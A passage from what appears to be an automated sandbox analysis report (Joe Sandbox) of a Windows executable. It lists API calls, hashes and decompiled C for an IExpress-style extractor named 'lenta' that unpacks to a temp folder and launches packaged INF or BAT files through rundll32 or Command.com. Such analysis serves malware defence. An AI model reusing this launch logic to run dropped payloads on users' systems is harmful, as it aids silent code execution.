                                                                                                                                                                                                                                            0x008d3e68
                                                                                                                                                                                                                                            0x008d3e70
                                                                                                                                                                                                                                            0x008d3e74
                                                                                                                                                                                                                                            0x008d3e7c
                                                                                                                                                                                                                                            0x008d3e80
                                                                                                                                                                                                                                            0x008d3e82
                                                                                                                                                                                                                                            0x008d3e82
                                                                                                                                                                                                                                            0x008d3e87
                                                                                                                                                                                                                                            0x008d3e87
                                                                                                                                                                                                                                            0x008d3e8b
                                                                                                                                                                                                                                            0x008d3e91
                                                                                                                                                                                                                                            0x008d3e94
                                                                                                                                                                                                                                            0x008d3e96
                                                                                                                                                                                                                                            0x008d3e96
                                                                                                                                                                                                                                            0x008d3e9b
                                                                                                                                                                                                                                            0x008d3e9b
                                                                                                                                                                                                                                            0x008d3e9f
                                                                                                                                                                                                                                            0x008d3ea2
                                                                                                                                                                                                                                            0x008d3ea4
                                                                                                                                                                                                                                            0x008d3ea4
                                                                                                                                                                                                                                            0x008d3ea9
                                                                                                                                                                                                                                            0x008d3ea9
                                                                                                                                                                                                                                            0x008d3ead
                                                                                                                                                                                                                                            0x008d3eb3
                                                                                                                                                                                                                                            0x008d3eb6
                                                                                                                                                                                                                                            0x008d3eb8
                                                                                                                                                                                                                                            0x008d3eb8
                                                                                                                                                                                                                                            0x008d3ebd
                                                                                                                                                                                                                                            0x008d3ebd
                                                                                                                                                                                                                                            0x008d3ec1
                                                                                                                                                                                                                                            0x008d3ec3
                                                                                                                                                                                                                                            0x008d3ec5
                                                                                                                                                                                                                                            0x008d3ec5
                                                                                                                                                                                                                                            0x008d3eca
                                                                                                                                                                                                                                            0x008d3eca
                                                                                                                                                                                                                                            0x008d3ece
                                                                                                                                                                                                                                            0x008d3ed5
                                                                                                                                                                                                                                            0x008d3ed9
                                                                                                                                                                                                                                            0x008d3ee0
                                                                                                                                                                                                                                            0x008d3ee6
                                                                                                                                                                                                                                            0x008d3eea
                                                                                                                                                                                                                                            0x008d3eec
                                                                                                                                                                                                                                            0x008d3eee
                                                                                                                                                                                                                                            0x008d3ef3
                                                                                                                                                                                                                                            0x008d3ef3

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 008D3C11
                                                                                                                                                                                                                                            • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 008D3CDC
                                                                                                                                                                                                                                              • Part of subcall function 008D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 008D46A0
                                                                                                                                                                                                                                              • Part of subcall function 008D468F: SizeofResource.KERNEL32(00000000,00000000,?,008D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008D46A9
                                                                                                                                                                                                                                              • Part of subcall function 008D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 008D46C3
                                                                                                                                                                                                                                              • Part of subcall function 008D468F: LoadResource.KERNEL32(00000000,00000000,?,008D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008D46CC
                                                                                                                                                                                                                                              • Part of subcall function 008D468F: LockResource.KERNEL32(00000000,?,008D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008D46D3
                                                                                                                                                                                                                                              • Part of subcall function 008D468F: memcpy_s.MSVCRT ref: 008D46E5
                                                                                                                                                                                                                                              • Part of subcall function 008D468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 008D46EF
                                                                                                                                                                                                                                            • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,008D8C42), ref: 008D3D8F
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 008D3E26
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,008D8C42), ref: 008D3EFF
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(?,?,?,?,008D8C42), ref: 008D3F1F
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,008D8C42), ref: 008D3F40
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(?,?,?,?,008D8C42), ref: 008D3F47
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,008D8C42), ref: 008D3F76
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,008D8C42), ref: 008D3F80
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,008D8C42), ref: 008D3FC2
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
                                                                                                                                                                                                                                            • String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$lenta
                                                                                                                                                                                                                                            • API String ID: 1032054927-3356413666
                                                                                                                                                                                                                                            • Opcode ID: 6de25c1b5acbe3cd9eca1ab1bb8296ce9f555df3a331a4daa81d8a76c6dd27fd
                                                                                                                                                                                                                                            • Instruction ID: 188b1e80781d1cda9b9b76354fd2b173f85379cf119a7a216ea2802d0404019d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6de25c1b5acbe3cd9eca1ab1bb8296ce9f555df3a331a4daa81d8a76c6dd27fd
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 06B1CC70A093159BD720DF689845B6A77E5FB84710F100B2BFA95E63A0EB74CE44CB93
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            C-Code - Quality: 82%
                                                                                                                                                                                                                                            			E008D1AE8(long __ecx, CHAR** _a4, int* _a8) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				char _v527;
                                                                                                                                                                                                                                            				char _v528;
                                                                                                                                                                                                                                            				char _v1552;
                                                                                                                                                                                                                                            				CHAR* _v1556;
                                                                                                                                                                                                                                            				int* _v1560;
                                                                                                                                                                                                                                            				CHAR** _v1564;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t48;
                                                                                                                                                                                                                                            				CHAR* _t53;
                                                                                                                                                                                                                                            				CHAR* _t54;
                                                                                                                                                                                                                                            				char* _t57;
                                                                                                                                                                                                                                            				char* _t58;
                                                                                                                                                                                                                                            				CHAR* _t60;
                                                                                                                                                                                                                                            				void* _t62;
                                                                                                                                                                                                                                            				signed char _t65;
                                                                                                                                                                                                                                            				intOrPtr _t76;
                                                                                                                                                                                                                                            				intOrPtr _t77;
                                                                                                                                                                                                                                            				unsigned int _t85;
                                                                                                                                                                                                                                            				CHAR* _t90;
                                                                                                                                                                                                                                            				CHAR* _t92;
                                                                                                                                                                                                                                            				char _t105;
                                                                                                                                                                                                                                            				char _t106;
                                                                                                                                                                                                                                            				CHAR** _t111;
                                                                                                                                                                                                                                            				CHAR* _t115;
                                                                                                                                                                                                                                            				intOrPtr* _t125;
                                                                                                                                                                                                                                            				void* _t126;
                                                                                                                                                                                                                                            				CHAR* _t132;
                                                                                                                                                                                                                                            				CHAR* _t135;
                                                                                                                                                                                                                                            				void* _t138;
                                                                                                                                                                                                                                            				void* _t139;
                                                                                                                                                                                                                                            				void* _t145;
                                                                                                                                                                                                                                            				intOrPtr* _t146;
                                                                                                                                                                                                                                            				char* _t148;
                                                                                                                                                                                                                                            				CHAR* _t151;
                                                                                                                                                                                                                                            				void* _t152;
                                                                                                                                                                                                                                            				CHAR* _t155;
                                                                                                                                                                                                                                            				CHAR* _t156;
                                                                                                                                                                                                                                            				void* _t157;
                                                                                                                                                                                                                                            				signed int _t158;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t48 =  *0x8d8004; // 0x12cb0cef
                                                                                                                                                                                                                                            				_v8 = _t48 ^ _t158;
                                                                                                                                                                                                                                            				_t108 = __ecx;
                                                                                                                                                                                                                                            				_v1564 = _a4;
                                                                                                                                                                                                                                            				_v1560 = _a8;
                                                                                                                                                                                                                                            				E008D1680( &_v528, 0x104, __ecx);
                                                                                                                                                                                                                                            				if(_v528 != 0x22) {
                                                                                                                                                                                                                                            					_t135 = " ";
                                                                                                                                                                                                                                            					_t53 =  &_v528;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t135 = "\"";
                                                                                                                                                                                                                                            					_t53 =  &_v527;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t111 =  &_v1556;
                                                                                                                                                                                                                                            				_v1556 = _t53;
                                                                                                                                                                                                                                            				_t54 = E008D1A84(_t111, _t135);
                                                                                                                                                                                                                                            				_t156 = _v1556;
                                                                                                                                                                                                                                            				_t151 = _t54;
                                                                                                                                                                                                                                            				if(_t156 == 0) {
                                                                                                                                                                                                                                            					L12:
                                                                                                                                                                                                                                            					_push(_t111);
                                                                                                                                                                                                                                            					E008D1781( &_v268, 0x104, _t111, "C:\Users\jones\AppData\Local\Temp\IXP000.TMP\");
                                                                                                                                                                                                                                            					E008D658A( &_v268, 0x104, _t156);
                                                                                                                                                                                                                                            					goto L13;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t132 = _t156;
                                                                                                                                                                                                                                            					_t148 =  &(_t132[1]);
                                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                                            						_t105 =  *_t132;
                                                                                                                                                                                                                                            						_t132 =  &(_t132[1]);
                                                                                                                                                                                                                                            					} while (_t105 != 0);
                                                                                                                                                                                                                                            					_t111 = _t132 - _t148;
                                                                                                                                                                                                                                            					if(_t111 < 3) {
                                                                                                                                                                                                                                            						goto L12;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t106 = _t156[1];
                                                                                                                                                                                                                                            					if(_t106 != 0x3a || _t156[2] != 0x5c) {
                                                                                                                                                                                                                                            						if( *_t156 != 0x5c || _t106 != 0x5c) {
                                                                                                                                                                                                                                            							goto L12;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							goto L11;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						L11:
                                                                                                                                                                                                                                            						E008D1680( &_v268, 0x104, _t156);
                                                                                                                                                                                                                                            						L13:
                                                                                                                                                                                                                                            						_t138 = 0x2e;
                                                                                                                                                                                                                                            						_t57 = E008D66C8(_t156, _t138);
                                                                                                                                                                                                                                            						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
                                                                                                                                                                                                                                            							_t139 = 0x2e;
                                                                                                                                                                                                                                            							_t115 = _t156;
                                                                                                                                                                                                                                            							_t58 = E008D66C8(_t115, _t139);
                                                                                                                                                                                                                                            							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
                                                                                                                                                                                                                                            								_t156 = LocalAlloc(0x40, 0x400);
                                                                                                                                                                                                                                            								if(_t156 == 0) {
                                                                                                                                                                                                                                            									goto L43;
                                                                                                                                                                                                                                            								}
								_t65 = GetFileAttributesA( &_v268); // executed
								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
									E008D1680( &_v1552, 0x400, _t108);
								} else {
									_push(_t115);
									_t108 = 0x400;
									E008D1781( &_v1552, 0x400, _t115,  &_v268);
									if(_t151 != 0 &&  *_t151 != 0) {
										E008D16B3( &_v1552, 0x400, " ");
										E008D16B3( &_v1552, 0x400, _t151);
									}
								}
								_t140 = _t156;
								 *_t156 = 0;
								E008D2AAC( &_v1552, _t156, _t156);
								goto L53;
							} else {
								_t108 = "Command.com /c %s";
								_t125 = "Command.com /c %s";
								_t145 = _t125 + 1;
								do {
									_t76 =  *_t125;
									_t125 = _t125 + 1;
								} while (_t76 != 0);
								_t126 = _t125 - _t145;
								_t146 =  &_v268;
								_t157 = _t146 + 1;
								do {
									_t77 =  *_t146;
									_t146 = _t146 + 1;
								} while (_t77 != 0);
								_t140 = _t146 - _t157;
								_t154 = _t126 + 8 + _t146 - _t157;
								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
								if(_t156 != 0) {
									E008D171E(_t156, _t154, "Command.com /c %s",  &_v268);
									goto L53;
								}
								goto L43;
							}
						} else {
							_t85 = GetFileAttributesA( &_v268);
							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
								_t140 = 0x525;
								_push(0);
								_push(0x10);
								_push(0);
								_t60 =  &_v268;
								goto L35;
							} else {
								_t140 = "[";
								_v1556 = _t151;
								_t90 = E008D1A84( &_v1556, "[");
								if(_t90 != 0) {
									if( *_t90 != 0) {
										_v1556 = _t90;
									}
									_t140 = "]";
									E008D1A84( &_v1556, "]");
								}
								_t156 = LocalAlloc(0x40, 0x200);
								if(_t156 == 0) {
									L43:
									_t60 = 0;
									_t140 = 0x4b5;
									_push(0);
									_push(0x10);
									_push(0);
									L35:
									_push(_t60);
									E008D44B9(0, _t140);
									_t62 = 0;
									goto L54;
								} else {
									_t155 = _v1556;
									_t92 = _t155;
									if( *_t155 == 0) {
										_t92 = "DefaultInstall";
									}
									 *0x8d9120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
									 *_v1560 = 1;
									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0x8d1140, _t156, 8,  &_v268) == 0) {
										 *0x8d9a34 =  *0x8d9a34 & 0xfffffffb;
										if( *0x8d9a40 != 0) {
											_t108 = "setupapi.dll";
										} else {
											_t108 = "setupx.dll";
											GetShortPathNameA( &_v268,  &_v268, 0x104);
										}
										if( *_t155 == 0) {
											_t155 = "DefaultInstall";
										}
										_push( &_v268);
										_push(_t155);
										E008D171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
									} else {
										 *0x8d9a34 =  *0x8d9a34 | 0x00000004;
										if( *_t155 == 0) {
											_t155 = "DefaultInstall";
										}
										E008D1680(_t108, 0x104, _t155);
										_t140 = 0x200;
										E008D1680(_t156, 0x200,  &_v268);
									}
									L53:
									_t62 = 1;
									 *_v1564 = _t156;
									L54:
									_pop(_t152);
									return E008D6CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
								}
							}
						}
					}
				}
			}

                                                                                                                                                                                                                                            0x008d1b63
                                                                                                                                                                                                                                            0x008d1b63
                                                                                                                                                                                                                                            0x008d1b65
                                                                                                                                                                                                                                            0x008d1b68
                                                                                                                                                                                                                                            0x008d1b68
                                                                                                                                                                                                                                            0x008d1b6a
                                                                                                                                                                                                                                            0x008d1b6b
                                                                                                                                                                                                                                            0x008d1b6f
                                                                                                                                                                                                                                            0x008d1b74
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d1b76
                                                                                                                                                                                                                                            0x008d1b7b
                                                                                                                                                                                                                                            0x008d1b86
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d1b8c
                                                                                                                                                                                                                                            0x008d1b8c
                                                                                                                                                                                                                                            0x008d1b98
                                                                                                                                                                                                                                            0x008d1bc7
                                                                                                                                                                                                                                            0x008d1bc9
                                                                                                                                                                                                                                            0x008d1bcc
                                                                                                                                                                                                                                            0x008d1bd3
                                                                                                                                                                                                                                            0x008d1d75
                                                                                                                                                                                                                                            0x008d1d76
                                                                                                                                                                                                                                            0x008d1d78
                                                                                                                                                                                                                                            0x008d1d7f
                                                                                                                                                                                                                                            0x008d1e05
                                                                                                                                                                                                                                            0x008d1e09
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d1e12
                                                                                                                                                                                                                                            0x008d1e1b
                                                                                                                                                                                                                                            0x008d1e73
                                                                                                                                                                                                                                            0x008d1e21
                                                                                                                                                                                                                                            0x008d1e21
                                                                                                                                                                                                                                            0x008d1e28
                                                                                                                                                                                                                                            0x008d1e37
                                                                                                                                                                                                                                            0x008d1e3e
                                                                                                                                                                                                                                            0x008d1e52
                                                                                                                                                                                                                                            0x008d1e60
                                                                                                                                                                                                                                            0x008d1e60
                                                                                                                                                                                                                                            0x008d1e3e
                                                                                                                                                                                                                                            0x008d1e79
                                                                                                                                                                                                                                            0x008d1e7b
                                                                                                                                                                                                                                            0x008d1e84
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d1d9b
                                                                                                                                                                                                                                            0x008d1d9b
                                                                                                                                                                                                                                            0x008d1da0
                                                                                                                                                                                                                                            0x008d1da2
                                                                                                                                                                                                                                            0x008d1da5
                                                                                                                                                                                                                                            0x008d1da5
                                                                                                                                                                                                                                            0x008d1da7
                                                                                                                                                                                                                                            0x008d1da8
                                                                                                                                                                                                                                            0x008d1dac
                                                                                                                                                                                                                                            0x008d1dae
                                                                                                                                                                                                                                            0x008d1db4
                                                                                                                                                                                                                                            0x008d1db7
                                                                                                                                                                                                                                            0x008d1db7
                                                                                                                                                                                                                                            0x008d1db9
                                                                                                                                                                                                                                            0x008d1dba
                                                                                                                                                                                                                                            0x008d1dbe
                                                                                                                                                                                                                                            0x008d1dc3
                                                                                                                                                                                                                                            0x008d1dce
                                                                                                                                                                                                                                            0x008d1dd2
                                                                                                                                                                                                                                            0x008d1deb
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d1df0
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d1dd2
                                                                                                                                                                                                                                            0x008d1bf7
                                                                                                                                                                                                                                            0x008d1bfe
                                                                                                                                                                                                                                            0x008d1c07
                                                                                                                                                                                                                                            0x008d1d55
                                                                                                                                                                                                                                            0x008d1d5a
                                                                                                                                                                                                                                            0x008d1d5b
                                                                                                                                                                                                                                            0x008d1d5d
                                                                                                                                                                                                                                            0x008d1d5e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d1c1b
                                                                                                                                                                                                                                            0x008d1c1b
                                                                                                                                                                                                                                            0x008d1c20
                                                                                                                                                                                                                                            0x008d1c2c
                                                                                                                                                                                                                                            0x008d1c33
                                                                                                                                                                                                                                            0x008d1c38
                                                                                                                                                                                                                                            0x008d1c3a
                                                                                                                                                                                                                                            0x008d1c3a
                                                                                                                                                                                                                                            0x008d1c40
                                                                                                                                                                                                                                            0x008d1c4b
                                                                                                                                                                                                                                            0x008d1c4b
                                                                                                                                                                                                                                            0x008d1c5d
                                                                                                                                                                                                                                            0x008d1c61
                                                                                                                                                                                                                                            0x008d1dd4
                                                                                                                                                                                                                                            0x008d1dd4
                                                                                                                                                                                                                                            0x008d1dd6
                                                                                                                                                                                                                                            0x008d1ddb
                                                                                                                                                                                                                                            0x008d1ddc
                                                                                                                                                                                                                                            0x008d1dde
                                                                                                                                                                                                                                            0x008d1d64
                                                                                                                                                                                                                                            0x008d1d64
                                                                                                                                                                                                                                            0x008d1d67
                                                                                                                                                                                                                                            0x008d1d6c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d1c67
                                                                                                                                                                                                                                            0x008d1c67
                                                                                                                                                                                                                                            0x008d1c6d
                                                                                                                                                                                                                                            0x008d1c72
                                                                                                                                                                                                                                            0x008d1c74
                                                                                                                                                                                                                                            0x008d1c74

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 008D1BE7
                                                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 008D1BFE
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 008D1C57
                                                                                                                                                                                                                                            • GetPrivateProfileIntA.KERNEL32 ref: 008D1C88
                                                                                                                                                                                                                                            • GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,008D1140,00000000,00000008,?), ref: 008D1CB8
                                                                                                                                                                                                                                            • GetShortPathNameA.KERNEL32 ref: 008D1D1B
                                                                                                                                                                                                                                              • Part of subcall function 008D44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 008D4518
                                                                                                                                                                                                                                              • Part of subcall function 008D44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 008D4554
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                                                                                                                                                                                                            • String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                                                                                                                                                                                                            • API String ID: 383838535-2280873615
                                                                                                                                                                                                                                            • Opcode ID: 7b02f32fd526cb996a0215bb57fa6a9c2711700c2384d317c0de21fc14fa4bdf
                                                                                                                                                                                                                                            • Instruction ID: e2d255f38df7a0b5d917ddcad6d7bd8306ede9f5a042d011fee1bd83e20ef551
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7b02f32fd526cb996a0215bb57fa6a9c2711700c2384d317c0de21fc14fa4bdf
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ADA1E270A00218BBEF209B28DC48BEA776AFF55320F144397E555E33D1DBB49E898B51
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 324 8d597d-8d59b9 GetCurrentDirectoryA SetCurrentDirectoryA 325 8d59dd-8d5a1b GetDiskFreeSpaceA 324->325 326 8d59bb-8d59d8 call 8d44b9 call 8d6285 324->326 328 8d5ba1-8d5bde memset call 8d6285 GetLastError FormatMessageA 325->328 329 8d5a21-8d5a4a MulDiv 325->329 341 8d5c05-8d5c14 call 8d6ce0 326->341 338 8d5be3-8d5bfc call 8d44b9 SetCurrentDirectoryA 328->338 329->328 332 8d5a50-8d5a6c GetVolumeInformationA 329->332 335 8d5a6e-8d5ab0 memset call 8d6285 GetLastError FormatMessageA 332->335 336 8d5ab5-8d5aca SetCurrentDirectoryA 332->336 335->338 340 8d5acc-8d5ad1 336->340 352 8d5c02 338->352 344 8d5ad3-8d5ad8 340->344 345 8d5ae2-8d5ae4 340->345 344->345 347 8d5ada-8d5ae0 344->347 349 8d5ae7-8d5af8 345->349 350 8d5ae6 345->350 347->340 347->345 351 8d5af9-8d5afb 349->351 350->349 354 8d5afd-8d5b03 351->354 355 8d5b05-8d5b08 351->355 356 8d5c04 352->356 354->351 354->355 357 8d5b0a-8d5b1b call 8d44b9 355->357 358 8d5b20-8d5b27 355->358 356->341 357->352 360 8d5b29-8d5b33 358->360 361 8d5b52-8d5b5b 358->361 360->361 363 8d5b35-8d5b50 360->363 364 8d5b62-8d5b6d 361->364 363->364 365 8d5b6f-8d5b74 364->365 366 8d5b76-8d5b7d 364->366 367 8d5b85 365->367 368 8d5b7f-8d5b81 366->368 369 8d5b83 366->369 370 8d5b87-8d5b94 call 8d268b 367->370 371 8d5b96-8d5b9f 367->371 368->367 369->367 370->356 371->356
                                                                                                                                                                                                                                            C-Code - Quality: 96%
                                                                                                                                                                                                                                            			E008D597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v16;
                                                                                                                                                                                                                                            				char _v276;
                                                                                                                                                                                                                                            				char _v788;
                                                                                                                                                                                                                                            				long _v792;
                                                                                                                                                                                                                                            				long _v796;
                                                                                                                                                                                                                                            				long _v800;
                                                                                                                                                                                                                                            				signed int _v804;
                                                                                                                                                                                                                                            				long _v808;
                                                                                                                                                                                                                                            				int _v812;
                                                                                                                                                                                                                                            				long _v816;
                                                                                                                                                                                                                                            				long _v820;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t46;
                                                                                                                                                                                                                                            				int _t50;
                                                                                                                                                                                                                                            				signed int _t55;
                                                                                                                                                                                                                                            				void* _t66;
                                                                                                                                                                                                                                            				int _t69;
                                                                                                                                                                                                                                            				signed int _t73;
                                                                                                                                                                                                                                            				signed short _t78;
                                                                                                                                                                                                                                            				signed int _t87;
                                                                                                                                                                                                                                            				signed int _t101;
                                                                                                                                                                                                                                            				int _t102;
                                                                                                                                                                                                                                            				unsigned int _t103;
                                                                                                                                                                                                                                            				unsigned int _t105;
                                                                                                                                                                                                                                            				signed int _t111;
                                                                                                                                                                                                                                            				long _t112;
                                                                                                                                                                                                                                            				signed int _t116;
                                                                                                                                                                                                                                            				CHAR* _t118;
                                                                                                                                                                                                                                            				signed int _t119;
                                                                                                                                                                                                                                            				signed int _t120;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t114 = __edi;
                                                                                                                                                                                                                                            				_t46 =  *0x8d8004; // 0x12cb0cef
                                                                                                                                                                                                                                            				_v8 = _t46 ^ _t120;
                                                                                                                                                                                                                                            				_v804 = __edx;
                                                                                                                                                                                                                                            				_t118 = __ecx;
                                                                                                                                                                                                                                            				GetCurrentDirectoryA(0x104,  &_v276);
                                                                                                                                                                                                                                            				_t50 = SetCurrentDirectoryA(_t118); // executed
                                                                                                                                                                                                                                            				if(_t50 != 0) {
                                                                                                                                                                                                                                            					_push(__edi);
                                                                                                                                                                                                                                            					_v796 = 0;
                                                                                                                                                                                                                                            					_v792 = 0;
                                                                                                                                                                                                                                            					_v800 = 0;
                                                                                                                                                                                                                                            					_v808 = 0;
                                                                                                                                                                                                                                            					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
                                                                                                                                                                                                                                            					__eflags = _t55;
                                                                                                                                                                                                                                            					if(_t55 == 0) {
                                                                                                                                                                                                                                            						L29:
                                                                                                                                                                                                                                            						memset( &_v788, 0, 0x200);
                                                                                                                                                                                                                                            						 *0x8d9124 = E008D6285();
                                                                                                                                                                                                                                            						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                                                                                                                                                                                            						_t110 = 0x4b0;
                                                                                                                                                                                                                                            						L30:
                                                                                                                                                                                                                                            						__eflags = 0;
                                                                                                                                                                                                                                            						E008D44B9(0, _t110, _t118,  &_v788, 0x10, 0);
                                                                                                                                                                                                                                            						SetCurrentDirectoryA( &_v276);
                                                                                                                                                                                                                                            						L31:
                                                                                                                                                                                                                                            						_t66 = 0;
                                                                                                                                                                                                                                            						__eflags = 0;
                                                                                                                                                                                                                                            						L32:
                                                                                                                                                                                                                                            						_pop(_t114);
                                                                                                                                                                                                                                            						goto L33;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t69 = _v792 * _v796;
                                                                                                                                                                                                                                            					_v812 = _t69;
                                                                                                                                                                                                                                            					_t116 = MulDiv(_t69, _v800, 0x400);
                                                                                                                                                                                                                                            					__eflags = _t116;
                                                                                                                                                                                                                                            					if(_t116 == 0) {
                                                                                                                                                                                                                                            						goto L29;
                                                                                                                                                                                                                                            					}
